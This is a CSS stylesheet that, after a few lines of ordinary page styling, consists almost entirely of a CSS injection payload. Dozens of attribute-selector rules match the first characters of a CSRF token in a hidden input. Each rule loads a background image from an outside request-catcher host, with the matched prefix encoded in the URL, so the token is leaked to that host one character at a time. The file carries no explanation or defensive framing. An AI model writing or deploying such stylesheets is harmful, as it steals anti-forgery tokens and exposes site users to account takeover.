html, body {
    width: 100%;
    margin: 0;
    padding: 0;
    color: #eeeeee;
    background: #232323;
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA0']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+48);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA1']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+49);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA2']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+50);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA3']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+51);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA4']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+52);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA5']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+53);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA6']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+54);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA7']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+55);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA8']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+56);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA9']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+57);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAa']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+97);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAb']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+98);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAc']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+99);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAd']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+100);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAe']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+101);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAf']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+102);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAg']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+103);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAh']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+104);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAi']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+105);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAj']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+106);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAk']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+107);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAl']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+108);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAm']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+109);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAn']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+110);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAo']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+111);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAp']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+112);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAq']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+113);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAr']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+114);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAs']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+115);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAt']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+116);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAu']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+117);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAv']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+118);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAw']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+119);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAx']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+120);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAy']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+121);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAz']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+122);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAA']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+65);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAB']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+66);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAC']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+67);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAD']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+68);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAE']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+69);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAF']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+70);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAG']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+71);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAH']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+72);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAI']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+73);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAJ']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+74);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAK']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+75);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAL']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+76);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAM']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+77);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAN']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+78);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAO']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+79);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAP']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+80);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAQ']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+81);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAR']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+82);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAS']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+83);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAT']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+84);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAU']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+85);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAV']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+86);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAW']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+87);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAX']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+88);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAY']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+89);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCAZ']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+90);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA!']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+33);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA#']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+35);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA$']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+36);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA%']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+37);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA&']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+38);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA"']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+34);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA(']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+40);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA)']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+41);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA*']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+42);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA+']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+43);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA,']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+44);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA-']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+45);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA.']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+46);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA/']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+47);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA:']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+58);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA;']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+59);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA<']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+60);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA=']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+61);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA>']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+62);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA?']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+63);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA@']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+64);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA[']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+91);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA]']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+93);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA^']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+94);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA_']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+95);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA`']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+96);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA{']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+123);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA|']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+124);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA}']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+125);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA~']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+126);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA ']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65+32);
}

